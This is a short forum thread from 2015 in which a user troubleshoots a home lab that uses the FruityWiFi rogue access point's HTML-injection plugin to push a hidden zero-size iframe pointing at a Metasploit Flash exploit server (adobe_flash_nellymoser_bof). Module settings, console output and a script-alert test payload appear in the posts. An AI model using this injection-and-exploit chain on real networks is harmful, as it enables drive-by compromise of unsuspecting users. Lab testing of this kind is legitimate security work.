|
Post by xtr4nge on Aug 8, 2015 9:49:11 GMT
--
|
|
|
Post by m3m0r3x on Nov 15, 2015 22:18:11 GMT
Hi xtr4ange, I have just made some tests with the FruityProxy Plugins. I have also tested URLSnarf and BDFProxy (wich by the way is really awesome) and they both work pretty good. But i have tried this Plugin (HTMLinject) and I can't get some nice results. I believe my problem is some kind of routing problem. But first i want you to explain my lab. The hole infrastructure is in a VPN environment. I Have my Attacker PC running KALI and MSF 10.8.0.6 I have the FruityWiFi PI 10.8.0.10 I have a VPS 10.0.0.1 gateway to the internet and connection point for my attacker PC And I have the Victim (which is set up in Virtual box) getting the IP 10.0.0.68 from Karma) This exact same setup works fine for the BDFProxy-Plugin. Even Example [ <script>alert('Fruits of DOOM ')</script> ] works fine. I set up the Exploit as follow: Name Current Setting Required Description ---- --------------- -------- ----------- Retries true no Allow the browser to retry the module SRVHOST 10.8.0.6 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH demo no The URI to use for this exploit (default is random)
and in the inject.txt wrote down: <iframe src='http://10.8.0.6:8080/demo' width='0' height='0' tabindex='1'></iframe> But when I browse a webpage i can see (also in wireshark i see that) the browser is connecting to http://10.8.0.6:8080/demo and gets back a "http 303" (moved) But in Metasploit I get: msf exploit(adobe_flash_nellymoser_bof) > exploit [*] Exploit running as background job.
[*] Started reverse handler on 192.168.178.47:4444 msf exploit(adobe_flash_nellymoser_bof) > [*] Using URL: http://10.8.0.6:8080/demo [*] Server started. [*] 10.8.0.10 adobe_flash_nellymoser_bof - Gathering target information. [*] 10.8.0.10 adobe_flash_nellymoser_bof - Sending HTML response. [!] 10.8.0.10 adobe_flash_nellymoser_bof - Exploit requirement(s) not met: flash. For more info: http://r-7.co/PVbcgx
The point that makes me confused is that I get Error from from 10.8.0.10 that I have not the correct Adobe Version. 10.8.0.10 is the Raspberry with FruityWiFi instaaled. but the Victim is 10.0.0.68 connected to the FruityWiFi Pi. On the Victim (10.0.0.68) I have installed the adobe flash player version 18.0.0.160 which is required. Have i to install flash on the FruityWifi Raspberry, too? Or do i have to set just an IPTable rule due to faulty rooting? Greetings and thanks in advance m3m
|
|
|
Post by m3m0r3x on Nov 17, 2015 19:12:15 GMT
And again fail in reading. I tested the module with the correct exploit and the correct settings. But I used the wrong target OS respectively the wrong architecture. I testet under x64 the first time. Today I tested the module (with nellymoser exploit) under the correct architecture as it is written in the exploit infos. Windows 7 x86.
Damn it.
By the way this module is awesome.
Greetings
M3m
|
|
|
Post by xtr4nge on Nov 20, 2015 9:02:14 GMT
Hi m3m0r3x, Sorry for the delay in my response. Cool, glad that you solved the problem I will try to add new plugins and more options as soon as I can regards,
|
|